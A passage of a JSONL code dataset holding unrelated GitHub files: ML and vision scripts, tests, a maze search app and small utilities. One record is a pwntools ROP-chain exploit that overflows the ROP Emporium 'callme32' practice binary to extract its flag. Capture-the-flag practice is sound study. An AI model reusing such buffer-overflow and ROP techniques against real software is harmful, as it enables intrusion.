is_prepared_to_train(prepared_data_dir):\n if not os.path.isfile(prepared_data_dir + os.sep + 'mean.npy'):\n return False\n if not os.path.isfile(prepared_data_dir + os.sep + 'train.txt'):\n return False\n if not os.path.isfile(prepared_data_dir + os.sep + 'test.txt'):\n return False\n return True\n\ndef inspect(image_file_path, target_model, prepared_data_dir, network):\n # resize\n head, tail = os.path.split(image_file_path)\n resized_image = TEMP_IMAGE_DIR + os.sep + get_timestamp() + '_' + tail\n resize_image(image_file_path, resized_image)\n # inspection\n gpu_info = get_gpu_info()\n gpu = -1 if 'error' in gpu_info else 0\n ret = imagenet_inspect.inspect(resized_image, prepared_data_dir + os.sep + 'mean.npy', target_model, prepared_data_dir + os.sep + 'labels.txt', network, gpu)\n return ret\n\ndef count_files(path):\n ch = os.listdir(path)\n counter = 0\n for c in ch:\n if os.path.isdir(path + os.sep + c):\n counter += count_files(path + os.sep + c)\n else:\n counter += 1\n return counter\n \n# path配下の画像をランダムでnum枚取り出す。\n# path配下がディレクトリしか無い場合は配下のディレクトリから\ndef get_files_in_random_order(path, num):\n children_files = os.listdir(path)\n children_files_num = len(children_files)\n if children_files_num is 0:\n return []\n elif children_files_num is 1:\n if os.path.isdir(path + os.sep + children_files[0]):\n path = path + os.sep + children_files[0]\n temp_file_num = len(os.listdir(path))\n if temp_file_num < num:\n num = temp_file_num\n else:\n num = 1\n elif children_files_num < num:\n num = children_files_num\n files = []\n candidates = random.sample(map(lambda n: path + os.sep + n, os.listdir(path)), num)\n for f in candidates:\n if os.path.isdir(f):\n files.extend(get_files_in_random_order(f, 1))\n else:\n files.append(f.replace(UPLOADED_IMAGES_DIR, ''))\n return files;\n \ndef get_timestamp():\n return datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n \ndef count_categories(path):\n ch = os.listdir(path)\n count = 0\n if len(ch) is 1:\n if os.path.isdir(path + os.sep + ch[0]):\n count += count_categories(path + os.sep + ch[0])\n else:\n for c in ch:\n if os.path.isdir(path + os.sep + c):\n count += 1\n return count\n \ndef get_gpu_info():\n ret = {}\n current_platform = platform.system()\n try:\n if current_platform == 'Windows':\n xml = subprocess.check_output([NVIDIA_SMI_CMD, '-q', '-x'], shell=True)\n else:\n xml = subprocess.check_output([NVIDIA_SMI_CMD, '-q', '-x'])\n except:\n return {'error': 'command_not_available'}\n elem = fromstring(xml)\n ret['driver_version'] = elem.find('driver_version').text\n gpus = elem.findall('gpu')\n ret_gpus = []\n for g in gpus:\n info = {\n 'product_name': g.find('product_name').text,\n 'uuid': g.find('uuid').text,\n 'fan': g.find('fan_speed').text,\n 'minor_number': g.find('minor_number').text\n }\n temperature = g.find('temperature')\n info['temperature'] = temperature.find('gpu_temp').text\n power = g.find('power_readings')\n info['power_draw'] = power.find('power_draw').text\n info['power_limit'] = power.find('power_limit').text\n memory = g.find('fb_memory_usage')\n info['memory_total'] = memory.find('total').text\n info['memory_used'] = memory.find('used').text\n utilization = g.find('utilization')\n info['gpu_util'] = utilization.find('gpu_util').text\n ret_gpus.append(info)\n if current_platform == 'Linux':\n ret_gpus.sort(cmp=lambda x,y: cmp(int(x['minor_number']), int(y['minor_number'])))\n ret['gpus'] = ret_gpus\n return ret\n\ndef get_chainer_version():\n return chainer.__version__\n \ndef get_python_version():\n v = sys.version_info\n return str(v[0]) + '.' + str(v[1]) + '.' + str(v[2])\n \ndef show_error_screen(error):\n return bottle.template('errors.html', detail=error)\n \napp.run(host=settings['host'], port=settings['port'], debug=settings['debug'])\n\n","repo_name":"akiraak/deepstation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":23825,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"27476433559","text":"def count_pairs(letters):\n hash = {}\n result = {\"pair\": 0, \"single\": 0}\n\n for letter in letters:\n if hash.get(letter):\n hash[letter] += 1\n else:\n hash[letter] = 1\n\n for k, v in hash.items():\n if v > 1:\n result[\"pair\"] += v - (v % 2)\n result[\"single\"] += v % 2\n else:\n result[\"single\"] += 1\n\n return result\n\n\ndef main(letters):\n counter = 0\n\n pairs = count_pairs(letters)\n counter += pairs[\"pair\"]\n\n if pairs[\"single\"] > 0:\n counter += 1\n\n return counter\n","repo_name":"imteekay/algorithms","sub_path":"coding_interviews/leetcode/easy/longest_palindrome.py","file_name":"longest_palindrome.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":452,"dataset":"github-code","pt":"61"} +{"seq_id":"40749845819","text":"import pytest\nfrom queue import Queue\nfrom types import SimpleNamespace\n\nfrom cylc.flow.cycling.iso8601 import ISO8601Point\nfrom cylc.flow.simulation import sim_time_check\n\n\ndef get_msg_queue_item(queue, id_):\n for item in queue.queue:\n if id_ in str(item.job_id):\n return item\n\n\n@pytest.fixture(scope='module')\nasync def sim_time_check_setup(\n mod_flow, mod_scheduler, mod_start, mod_one_conf\n):\n schd = mod_scheduler(mod_flow({\n 'scheduler': {'cycle point format': '%Y'},\n 'scheduling': {\n 'initial cycle point': '1066',\n 'graph': {\n 'R1': 'one & fail_all & fast_forward'\n }\n },\n 'runtime': {\n 'one': {},\n 'fail_all': {\n 'simulation': {'fail cycle points': 'all'},\n 'outputs': {'foo': 'bar'}\n },\n # This task ought not be finished quickly, but for the speed up\n 'fast_forward': {\n 'execution time limit': 'PT1M',\n 'simulation': {'speedup factor': 2}\n }\n }\n }))\n msg_q = Queue()\n async with mod_start(schd):\n itasks = schd.pool.get_tasks()\n for i in itasks:\n i.try_timers = {'execution-retry': SimpleNamespace(num=0)}\n yield schd, itasks, msg_q\n\n\ndef test_false_if_not_running(sim_time_check_setup, monkeypatch):\n schd, itasks, msg_q = sim_time_check_setup\n\n # False if task status not running:\n assert sim_time_check(msg_q, itasks) is False\n\n\ndef test_sim_time_check_sets_started_time(sim_time_check_setup):\n \"\"\"But sim_time_check still returns False\"\"\"\n schd, _, msg_q = sim_time_check_setup\n one_1066 = schd.pool.get_task(ISO8601Point('1066'), 'one')\n one_1066.state.status = 'running'\n assert one_1066.summary['started_time'] is None\n assert sim_time_check(msg_q, [one_1066]) is False\n assert one_1066.summary['started_time'] is not None\n\n\ndef test_task_finishes(sim_time_check_setup, monkeypatch):\n \"\"\"...and an appropriate message sent.\n\n Checks all possible outcomes in sim_time_check where elapsed time is\n greater than the simulation time.\n\n Does NOT check every possible cause on an outcome - this is done\n in unit tests.\n \"\"\"\n schd, _, msg_q = sim_time_check_setup\n monkeypatch.setattr('cylc.flow.simulation.time', lambda: 0)\n\n # Setup a task to fail\n fail_all_1066 = schd.pool.get_task(ISO8601Point('1066'), 'fail_all')\n fail_all_1066.state.status = 'running'\n fail_all_1066.try_timers = {'execution-retry': SimpleNamespace(num=0)}\n\n # Before simulation time is up:\n assert sim_time_check(msg_q, [fail_all_1066]) is False\n\n # After simulation time is up:\n monkeypatch.setattr('cylc.flow.simulation.time', lambda: 12)\n assert sim_time_check(msg_q, [fail_all_1066]) is True\n assert get_msg_queue_item(msg_q, '1066/fail_all').message == 'failed'\n\n # Succeeds and records messages for all outputs:\n fail_all_1066.try_timers = {'execution-retry': SimpleNamespace(num=1)}\n msg_q = Queue()\n assert sim_time_check(msg_q, [fail_all_1066]) is True\n assert sorted(i.message for i in msg_q.queue) == ['bar', 'succeeded']\n\n\ndef test_task_sped_up(sim_time_check_setup, monkeypatch):\n \"\"\"Task will speed up by a factor set in config.\"\"\"\n schd, _, msg_q = sim_time_check_setup\n fast_forward_1066 = schd.pool.get_task(\n ISO8601Point('1066'), 'fast_forward')\n fast_forward_1066.state.status = 'running'\n\n monkeypatch.setattr('cylc.flow.simulation.time', lambda: 0)\n assert sim_time_check(msg_q, [fast_forward_1066]) is False\n monkeypatch.setattr('cylc.flow.simulation.time', lambda: 29)\n assert sim_time_check(msg_q, [fast_forward_1066]) is False\n monkeypatch.setattr('cylc.flow.simulation.time', lambda: 31)\n assert sim_time_check(msg_q, [fast_forward_1066]) is True\n","repo_name":"hjoliver/cylc-flow","sub_path":"tests/integration/test_simulation.py","file_name":"test_simulation.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"73182862595","text":"import cv2\nimport numpy as np\nimport torch\nimport torchvision\nfrom pathlib import Path\nfrom PIL import Image\nfrom object_detection_util import getImageInterestArea\nfrom pose_estimation_util import getPersonPosition\n\n# Object detection model\n# Define the path to the YOLOv5 directory\nyolov5_dir = Path(\"./yolov5\")\n\n# Load the YOLOv5 model for object detection\nmodel = torch.hub.load(str(yolov5_dir), \"custom\", path=str(yolov5_dir / \"yolov5s.pt\"), source=\"local\")\nmodel.conf = 0.4\n\n# Set the device (CPU or GPU)\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nmodel.to(device).eval()\n\n# Pose estimation model\n# create a model object from the keypointrcnn_resnet50_fpn class\nmodel_pose_estimation = torchvision.models.detection.keypointrcnn_resnet50_fpn(pretrained=True)\nmodel_pose_estimation.eval()\n\n# Load the video\nvideo = cv2.VideoCapture(\"./images/video_test4.mp4\")\nif (video.isOpened() == False): \n print(\"Unable to read camera feed\")\n\n# Create output video\nfps = 30\nframe_width = int(video.get(3))\nframe_height = int(video.get(4))\nout = cv2.VideoWriter('outpy.avi',cv2.VideoWriter_fourcc('M','J','P','G'), fps, (frame_width,frame_height))\n\n# Configuration for text\nfont = cv2.FONT_HERSHEY_SIMPLEX\norg = (50, 50)\nfontScale = 1\ncolor = (255, 255, 255)\nthickness = 2\n\nframe_count = 0\nwhile True:\n ret, frame = video.read()\n if not ret:\n break\n \n frame_pil = Image.fromarray(frame[:, :, ::-1])\n\n # Perform object detection using YOLOv5\n results = model(frame_pil, size=640)\n\n # Process area in the image with a person\n interestArea = getImageInterestArea(frame, results)\n\n # Find the person position on image\n position = getPersonPosition(frame, model_pose_estimation)\n\n # Add info text on the result frame\n outImg = position[0]\n outImg = cv2.putText(outImg, (\"Posicao: \" + str(position[1])), org, font, fontScale, color, thickness, cv2.LINE_AA)\n if(interestArea != None):\n outImg = cv2.putText(outImg, (\"Objetos: \" + ' '.join(interestArea[1])), (50, 100), font, 0.7, color, thickness, cv2.LINE_AA)\n cv2.imshow(\"output\", outImg)\n out.write(outImg)\n\n # Save the results\n cv2.imwrite(\"yolo_output.png\", np.squeeze(results.render()))\n cv2.imwrite(\"input.png\", frame)\n cv2.imwrite(\"keypoints.png\", position[0])\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nvideo.release()\ncv2.destroyAllWindows()","repo_name":"GustavoHen12/VisaoComputacional","sub_path":"FINAL/ta5.py","file_name":"ta5.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72529260354","text":"from skmultilearn.problem_transform import ClassifierChain\nimport numpy as np\nimport sklearn\n\n\nclass ClassifierChainEnsemble(object):\n \"\"\"An ensemble of ClassifierChains. ClassifierChain has been implemented in skmultilearn.\n ClassifierChainEnsemble is a meta estimator that creates an ensemble of classifier chains\n on multilabel classification problems and averages the predictions of classifiers in the ensemble to\n improve predictive accuracy.\n The order of the labels in each ClassifierChain are chosen randomly.\n I have not implemented multiclass ensemble yet. Currently, ClassifierChainEnsemble class supports binary class,\n multilabel ensembling\n Parameters\n ----------\n base_estimator : object, optional (default=None)\n The base estimator from which the ensemble is built.\n n_estimators : integer\n The number of estimators in the ensemble.\n estimator_params : list of strings\n The list of attributes to use as parameters when instantiating a\n new base estimator. If none are given, default parameters are used.\n Attributes\n ----------\n _ensemble : list of estimators\n The collection of fitted classifier chains.\n perms_list : list of permutations\n list of permutations of labels used to train classifier chains\n \"\"\"\n\n def __init__(self, base_estimator, n_estimators=10,\n estimator_params=tuple()):\n\n # Set parameters\n\n self.base_estimator = base_estimator\n self.n_estimators = n_estimators\n self.estimator_params = estimator_params\n # define perms_list to keep track of permutations shown to ClassifierChain\n self.perms_list = [[] for _ in range(n_estimators)]\n self._ensemble = [ClassifierChain(base_estimator) for _ in range(n_estimators)]\n\n\n def _bag(self, table):\n \"\"\"\n :type table: numpy array\n _bag is an internal method, not to be called explicitly.\n \"\"\"\n avg_pred = table.sum(0) / float(self.n_estimators)\n return avg_pred\n\n\n def fit(self, X, Y):\n \"\"\"\n :param X: training set as numpy array of shape [n_samples, n_features]\n :param Y: training labels as numpy array of shape [n_samples, n_labels]\n :return: None\n The method trains n_estimator classifier chains, each on a random permutation of labels\n \"\"\"\n\n # will have to implement selecting random subsets of X later\n for i in range(0, self.n_estimators):\n self.perms_list[i] = np.random.permutation(Y.shape[1])\n # print(self.perms_list[i])\n # print(Y[:, self.perms_list[i]])\n self._ensemble[i].fit(X, Y[:, self.perms_list[i]])\n\n def predict(self, X, rule=\"majority_vote\"):\n \"\"\"\n :param X: testing set as numpy array of shape [n_samples, n_features]\n :param rule: the polling rule used to decide between the predicted classes. Only \"majority_vote\" for binary classes\n has been implemented at this point.\n :return: predicted labels for each row of X as numpy array of shape [n_test_samples, n_labels]\n ClassifierChain predicts labels in the order of labels shown to it. We undo these permutations used to train\n classifier chains (using np.argsort in the following) when predicting the labels in the test set\n \"\"\"\n\n prediction_mat = []\n for i in range(self.n_estimators):\n reverse_perm = np.argsort(self.perms_list[i])\n prediction_mat.append(self._ensemble[i].predict(X).todense()[:, reverse_perm])\n prediction_mat = np.asarray(prediction_mat)\n result = self._bag(prediction_mat)\n if rule == \"majority_vote\":\n threshold = 0.5\n result[result >= threshold] = 1\n result[result < threshold] = 0\n return result\n\n\n def predict_proba(self, X):\n \"\"\"\n :param X: testing set as numpy array of shape [n_samples, n_features]\n :return: predicted probability of being in one class for each row of X as numpy array of shape\n [n_test_samples, n_labels]\n ClassifierChain predicts labels in the order of labels shown to it. We undo these permutations used to train\n classifier chains (using np.argsort in the following) when predicting the labels in the test set\n \"\"\"\n\n predict_proba_mat = []\n for i in range(self.n_estimators):\n reverse_perm = np.argsort(self.perms_list[i])\n predict_proba_mat.append(self._ensemble[i].predict_proba(X).todense()[:, reverse_perm])\n predict_proba_mat = np.asarray(predict_proba_mat)\n result = self._bag(predict_proba_mat)\n return result\n\n\nif __name__ == \"__main__\":\n ensemble = ClassifierChainEnsemble(sklearn.linear_model.LogisticRegression(penalty=\"l1\", C=1))\n\n \"\"\"\n An example of how to use the ClassifierChainEnsemble class. Note that the synthetic dataset generated below can give errors\n that have to do with data generation rather than class implementation. In case of errors, run the script again.\n \"\"\"\n # this will generate a dataset\n from sklearn.datasets import make_multilabel_classification\n x, y = make_multilabel_classification(sparse=True, n_labels=5,n_classes=3,\n n_samples=5,\n #return_indicator='dense',\n allow_unlabeled=False)\n #fit the dataset\n ensemble.fit(x, y)\n pred_mat = ensemble.predict(x) #predicting (on the training data)\n pred_proba_mat = ensemble.predict_proba(x)\n\n #print the accuracy of the ensemble for each label\n for i in range(0,y.shape[1]):\n\t print(sum(pred_mat[:,i]==y[:,i])/float(y.shape[0]))","repo_name":"alexgzhou/DataScience","sub_path":"LabelCorrection-KingsWoo/source/classifier_chain.py","file_name":"classifier_chain.py","file_ext":"py","file_size_in_byte":5822,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"73138198913","text":"import numpy as np\nfrom exp_backprops import do_train_config\nimport os\nimport pandas as pd\nimport json\nimport pickle\n\nredo = False\n\n# divide mask amount\nbest_lambda = 1.0/(14*14*64)*np.power(0.2,2)\n\n\nif redo:\n n_masks_to_use = [5,10,20,40,80,150,220,250,300]\n print(sorted(n_masks_to_use))\n\n\n all_masks_path = './config_files/mask_files/all_filtered_masks.pkl'\n with open(all_masks_path,'rb') as f:\n all_mask_dict = pickle.load(f)\n mask_keys_sorted = list(sorted(all_mask_dict['masks']))\n\n\n\n all_inds_list = ''\n\n result_paths = {'exp_path' : [],'n_masks' : []}\n for ind,nmasks in enumerate(n_masks_to_use):\n print('-----------------------------------------------')\n print('-----------------------------------------------')\n print('Doing EXP: {0} with nmasks: {1}'.format(ind,nmasks))\n print('-----------------------------------------------')\n print('-----------------------------------------------')\n\n # create file with lx number of masks\n # limit indexs list too\n temp_mask_dict = all_mask_dict.copy()\n selected_indexs = mask_keys_sorted[0: nmasks]\n temp_mask_dict['masks'] = {}\n temp_mask_dict['masks'] = {k: all_mask_dict['masks'][k] for k in selected_indexs}\n with open('temp_mask_file.pkl', 'wb') as f:\n pickle.dump(temp_mask_dict, f)\n with open('temp_inds_list.txt', 'w') as f:\n f.write('\\n'.join(selected_indexs))\n\n\n config_file = './config_files/train_files/gen_imagenet_subset_09_oct_074.json'\n exp_params_dict = {}\n exp_params_dict['indexs_string'] = 'n02114548_10505.JPEG,n02120079_9808.JPEG,n02114548_11513.JPEG,n02120079_4409.JPEG,n02114548_5207.JPEG'\n exp_params_dict['n_iterations'] = 100\n exp_params_dict['iter_till_insert'] = 1\n exp_params_dict['gens_per_original'] = 1\n exp_params_dict['skip_insert'] = False\n exp_params_dict['batch_size_exp'] = 50\n exp_params_dict['exp_list'] = [13]\n exp_params_dict['base_name'] = 'loss_v1_allmasks_iterative_{0}'.format(ind)\n exp_params_dict['dropout_k'] = 20\n exp_params_dict['mask_file_path_map'] = 'temp_mask_file.pkl'\n exp_params_dict['plot_masks'] = True\n exp_params_dict['missclass_index_path'] = 'temp_inds_list.txt'\n exp_params_dict['add_summary'] = True\n exp_params_dict['lambda_value'] = best_lambda\n\n res_path = do_train_config(config_file, **exp_params_dict)\n result_paths['exp_path'].append(res_path)\n result_paths['n_masks'].append(nmasks)\n\n os.remove('temp_mask_file.pkl')\n os.remove('temp_inds_list.txt')\n\n with open(\"resultados_mask_incremental_V1_exp.json\",'w') as f:\n json.dump(result_paths,f)\n\n\nimport matplotlib.pyplot as plt\n\nwith open(\"resultados_mask_incremental_V1_exp.json\",'r') as f:\n result_paths=json.load(f)\n\n# plot lambdas vs accuracy\nn_masks = []\naccs = []\nval_acc_col = 1\nfor i in range(len(result_paths['exp_path'])):\n path_resx = result_paths['exp_path'][i]\n lambda_x = result_paths['n_masks'][i]\n\n path_accs = os.path.join(path_resx, 'accuracy_simple.csv')\n data=pd.read_csv(path_accs,header=None)\n acc_last_it = data.iloc[-1][val_acc_col]\n\n n_masks.append(lambda_x)\n accs.append(acc_last_it)\n\nwith plt.style.context(('ggplot')):\n fig, ax = plt.subplots()\n ax.plot(n_masks,accs,'*--')\n ax.set_xlabel('Cantidad mascaras')\n ax.set_ylabel('Accuracy validacion')\n ax.grid()\n plt.savefig('seleccion_mascaras.png', dpi=100)","repo_name":"aferral/mejora_clasificador_feedback_CAM","sub_path":"exp_scripts/v1_choose_mask_num.py","file_name":"v1_choose_mask_num.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41813840408","text":"from pwn import *\n\nBINARY = \"./callme32\"\nELF = ELF(BINARY)\n\ncontext.os = \"linux\"\ncontext.arch = \"i386\"\ncontext.binary = BINARY\n\np = process(BINARY)\n\nrop = b\"A\" * 44\n\nfor func in ['callme_one', 'callme_two', 'callme_three']:\n rop += p32(ELF.symbols[func])\n rop += p32(0x80487f9) # pop esi ; pop edi ; pop ebp ; ret\n rop += p32(0xdeadbeef)\n rop += p32(0xcafebabe)\n rop += p32(0xd00df00d)\n\np.sendline(rop)\nlog.success(f\"ROPchain = {rop}\")\n\nflag = p.recvall().split(b'\\n')[-2]\nlog.success(f\"FLAG : {flag}\")\n","repo_name":"0xSoEasY/ROPemporium","sub_path":"x86/2-callme/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"61"} +{"seq_id":"74986536193","text":"from datetime import datetime, timedelta\nimport random\n\nclass Student:\n def __init__(self, group, year, first_name, last_name):\n self.group = group\n self.year = year\n self.first_name = first_name\n self.last_name = last_name\n self.marks = []\n\n def add_mark(self, mark):\n self.marks.append(mark)\n\nclass Mark:\n def __init__(self, date, estimation):\n self.date = date\n self.estimation = estimation\n\n# Генерация случайной оценки или пропуска (по уважительной причине или нет)\ndef get_random_estimation():\n n = random.randint(0, 4)\n if n == 0:\n return \"2\"\n elif n == 1:\n return \"3\"\n elif n == 2:\n return \"4\"\n elif n == 3:\n return \"5\"\n else:\n return \"болезнь\"\n\n# Генерация оценок и посещаемости на 10 дней вперед для каждого студента\ndef generate_marks(students):\n current_date = datetime.today()\n for student in students:\n for i in range(10):\n date = current_date + timedelta(days=i)\n estimation = get_random_estimation()\n mark = Mark(date, estimation)\n student.add_mark(mark)\n\n# Добавление студента в группу\ndef add_student_to_group(group, year, first_name, last_name, students):\n student = Student(group, year, first_name, last_name)\n students.append(student)\n\n# Создание списка студентов\nstudents = []\nadd_student_to_group(\"Группа 1\", 2021, \"Иван\", \"Иванов\", students)\nadd_student_to_group(\"Группа 1\", 2021, \"Петр\", \"Петров\", students)\nadd_student_to_group(\"Группа 2\", 2020, \"Александр\", \"Сидоров\", students)\n\n# Генерация оценок и посещаемости на 10 дней вперед для каждого студента\ngenerate_marks(students)\n\n# Вывод оценок и посещаемости для каждого студента\nfor student in students:\n print(f\"{student.group} {student.year}, {student.first_name} {student.last_name}\")\n for mark in student.marks:\n print(f\"{mark.date.date()} - {mark.estimation}\")\n print()\n","repo_name":"Dedok35/ExamAlgorithmization_PalaginD.V.","sub_path":"Python.py","file_name":"Python.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4341736914","text":"# main.py\n# ---------------\n# Licensing Information: You are free to use or extend this projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to the University of Illinois at Urbana-Champaign\n#\n# Created by Kelvin Ma (kelvinm2@illinois.edu) on 01/24/2021, \n# Inspired by previous work by Michael Abir (abir2@illinois.edu) and Rahul Kunji (rahulsk2@illinois.edu)\n\n\"\"\"\nThis file contains the main application that is run for this MP. It\ninitializes the pygame context, and handles the interface between the\ngame and the search algorithm.\n\"\"\"\n\nimport sys, argparse, time\n\nfrom pygame.constants import K_d, K_u\nfrom const import WALL_CHAR\n\nimport pygame\n\nfrom maze import Maze\nimport search\n\nclass gradient:\n def __init__(self, start, end):\n # rgb colors\n self.start = start \n self.end = end \n \n def __getitem__(self, fraction):\n t = fraction[0] / max(1, fraction[1] - 1) # prevent division by zero\n return tuple(max(0, min(start * (1 - t) + end * t, 255)) \n for start, end in zip(self.start, self.end))\n\nclass agent:\n def __init__(self, position, maze):\n self.position = position \n self.maze = maze \n\n def move(self, move):\n position = tuple(i + move for i, move in zip(self.position, move))\n if self.maze.isValidMove( * position, True ):\n previous = self.position\n self.position = position \n return previous,\n else: \n return ()\n \nclass Application:\n def __init__(self, human = True, scale = 20, fps = 30, alt_color = False):\n self.running = True\n self.scale = scale\n self.fps = fps\n \n self.human = human \n # accessibility for colorblind students \n if alt_color:\n self.gradient = gradient((64, 224, 208), (139, 0, 139))\n else:\n self.gradient = gradient((255, 0, 0), (0, 255, 0))\n\n def run(self, filepath, mode, save):\n self.maze = Maze(None, None, filepath=filepath)\n h, w, l = self.maze.getDimensions()\n self.width = w\n \n self.window = ((l * w + (l - 1) * 2) * self.scale, h * self.scale)\n\n if self.human:\n self.agent = agent(self.maze.getStart(), self.maze)\n states_explored = 0\n path = []\n else:\n #time in seconds\n time_start = time.time()\n path = getattr(search, mode)(self.maze, True)\n states_explored = self.maze.states_explored\n time_total = time.time() - time_start \n if not path:\n print(\"No solution found!\")\n return\n\n pygame.init()\n \n self.surface = pygame.display.set_mode(self.window, pygame.HWSURFACE)\n self.surface.fill((255, 255, 255))\n pygame.display.flip()\n pygame.display.set_caption('MP2 ({0})'.format(filepath))\n\n if self.human:\n self.draw_player()\n else:\n print(\"\"\"\nResults \n{{\n path length : {0}\n states explored : {1}\n total execution time: {2:.2f} seconds\n}}\n \"\"\".format(len(path), states_explored, time_total))\n \n self.draw_path(path)\n\n self.draw_maze()\n self.draw_start()\n self.draw_objectives()\n\n pygame.display.flip()\n \n if type(save) is str:\n pygame.image.save(self.surface, save)\n self.running = False\n \n clock = pygame.time.Clock()\n \n while self.running:\n pygame.event.pump()\n clock.tick(self.fps)\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n raise SystemExit\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n raise SystemExit\n elif event.type == pygame.KEYDOWN and self.human:\n try:\n move = {\n pygame.K_RIGHT : ( 0, 1, 0),\n pygame.K_LEFT : ( 0, -1, 0),\n pygame.K_UP : (-1, 0, 0),\n pygame.K_DOWN : ( 1, 0, 0),\n pygame.K_u : ( 0, 0, 1),\n pygame.K_d : ( 0, 0,-1)\n }[event.key] \n path.extend(self.agent.move(move))\n except KeyError: \n pass\n \n self.loop(path + [self.agent.position])\n \n def unravel_idx(self, i, j, k):\n # helper to convert to 2d coordinates\n return (i, j+ k * (self.width + 2))\n\n # The game loop is where everything is drawn to the context. Only called when a human is playing\n def loop(self, path):\n self.draw_path(path)\n self.draw_objectives()\n self.draw_player()\n pygame.display.flip()\n\n # Draws the path (given as a list of (row, col, level) tuples) to the display context\n def draw_path(self, path):\n for x, coord in enumerate(path):\n self.draw_square(*self.unravel_idx(*coord), self.gradient[x, len(path)])\n \n # Draws the full maze to the display context\n def draw_maze(self):\n n, m, h = self.maze.getDimensions()\n for i in range(n):\n for j in range(m):\n for k in range(h):\n if self.maze[i, j, k] == WALL_CHAR:\n self.draw_square(*self.unravel_idx(i, j, k))\n \n def draw_square(self, i, j, color = (0, 0, 0)):\n pygame.draw.rect(self.surface, color, tuple(i * self.scale for i in (j, i, 1, 1)), 0)\n \n def draw_circle(self, i, j, color = (0, 0, 0), radius = None):\n if radius is None:\n radius = self.scale / 4\n pygame.draw.circle(self.surface, color, tuple(int((i + 0.5) * self.scale) for i in (j, i)), int(radius))\n\n # Draws the player to the display context, and draws the path moved (only called if there is a human player)\n def draw_player(self):\n self.draw_circle(*self.unravel_idx(*self.agent.position) , (0, 0, 255))\n\n # Draws the waypoints to the display context\n def draw_objectives(self):\n for i, j, k in self.maze.getObjectives():\n self.draw_circle(*self.unravel_idx(i, j, k))\n\n # Draws start location of path\n def draw_start(self):\n i, j, k = self.maze.getStart()\n pygame.draw.rect(self.surface, (0, 0, 255), tuple(int(i * self.scale) for i in (j + 0.25, i + k * (self.width + 2) + 0.25, 0.5, 0.5)), 0)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description = 'CS440 MP2 part 1', \n formatter_class = argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('path',\n help = 'path to maze file')\n parser.add_argument('--search', dest = 'search', type = str, default = 'bfs',\n choices = ('bfs'), \n help = 'search method')\n parser.add_argument('--scale', dest = 'scale', type = int, default = 20,\n help = 'display scale')\n parser.add_argument('--fps', dest = 'fps', type = int, default = 30,\n help = 'display framerate')\n parser.add_argument('--human', default = False, action = 'store_true',\n help = 'run in human-playable mode')\n parser.add_argument('--save', dest = 'save', type = str, default = None,\n help = 'save output to image file')\n parser.add_argument('--altcolor', dest = 'altcolor', default = False, action = 'store_true',\n help = 'view in an alternate color scheme')\n\n arguments = parser.parse_args()\n application = Application(arguments.human, arguments.scale, arguments.fps, arguments.altcolor)\n application.run(\n filepath = arguments.path, \n mode = arguments.search, \n save = arguments.save)","repo_name":"3180110750/CS440","sub_path":"MP2 Robotics/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":8194,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"30056786593","text":"import gc\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n\ndef nms(image, k=13, remove_plateaus_delta=-1.0):\n # https://stackoverflow.com/a/21023493/5630599\n #\n kernel = np.ones((k, k))\n # kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (k, k))\n mask = cv2.morphologyEx(image, cv2.MORPH_DILATE, kernel)\n mask = cv2.compare(image, mask, cv2.CMP_GE)\n if remove_plateaus_delta >= 0.0:\n kernel = np.ones((k, k))\n non_plateau_mask = cv2.morphologyEx(image, cv2.MORPH_ERODE, kernel)\n\n # non_plateau_mask = cv2.compare(image, non_plateau_mask, cv2.CMP_GT)\n cond = (image - non_plateau_mask) > remove_plateaus_delta\n non_plateau_mask = cond.astype(np.uint8) * 255\n mask = cv2.bitwise_and(mask, non_plateau_mask)\n\n return mask\n\n\ndef zero_crossing(image):\n # Detect zero-crossing\n # https://stackoverflow.com/a/48440931/\n\n # kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3))\n kernel = np.ones((3, 3))\n l_o_g = cv2.Laplacian(image, cv2.CV_32F)\n min_l_o_g = cv2.morphologyEx(l_o_g, cv2.MORPH_ERODE, kernel)\n max_l_o_g = cv2.morphologyEx(l_o_g, cv2.MORPH_DILATE, kernel)\n zero_cross = np.logical_or(np.logical_and(min_l_o_g < 0, l_o_g > 0), np.logical_and(max_l_o_g > 0, l_o_g < 0))\n\n return zero_cross\n\n\ndef grad_magn(gray, fx=None, fy=None, ddepth=cv2.CV_32F):\n scale = 1\n delta = 0\n if True:\n # Here said(see Notes) that cv2.Scharr better than cv2.Sobel\n # https://docs.opencv.org/2.4/doc/tutorials/imgproc/imgtrans/sobel_derivatives/sobel_derivatives.html#formulation\n if fx is None:\n grad_x = cv2.Scharr(gray, ddepth, 1, 0, scale=scale, delta=delta, borderType=cv2.BORDER_DEFAULT)\n else:\n grad_x = cv2.Scharr(fx, 